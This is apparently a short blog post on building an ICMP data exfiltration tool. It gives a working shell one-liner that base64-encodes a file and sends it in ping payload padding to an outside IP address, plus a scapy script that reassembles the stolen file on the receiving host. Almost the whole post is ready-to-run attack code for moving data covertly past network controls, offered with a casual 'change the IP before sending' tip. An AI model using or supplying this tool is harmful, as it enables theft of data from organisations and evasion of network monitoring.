DATA EXFILTRATION WITH ICMP PROTOCOL

Always curious to build your own ICMP protocol exfiltration tool to exfiltrate information.

Sending data

This will base64 encode important-data.txt and then stuff the encoded data 16 bytes at a time into ping.

Obviously you should change the IP before sending 🙂

base64 important-data.txt | xxd -ps -c 16 | while read i; do ping -c1 -s32 -p $i 8.8.8.8; done

Receiving data

You can grab the data off the wire using scapy. Here’s a short little script that takes an out file name as the first argument and then an optional interface name to listen on as the second argument.

from scapy.all import *
import sys
import base64

# script to extract data from ping padding (http://wumb0.in/ping-exfil.html)

try:
    config.conf.iface = sys.argv[2]
except: pass

s = sniff(lfilter=lambda x: x.haslayer(ICMP) and x[ICMP].type==8, stop_filter=lambda x: x.haslayer(ICMP) and x[ICMP].type==8 and '\n' in x[ICMP][Raw].load[8:24])

buf = ""
for i in s:
    buf += i[ICMP][Raw].load[8:24]

with open(sys.argv[1], "w") as f:
    f.write(base64.b64decode(buf[:buf.find('\n')]))
Share the Post:

Related Posts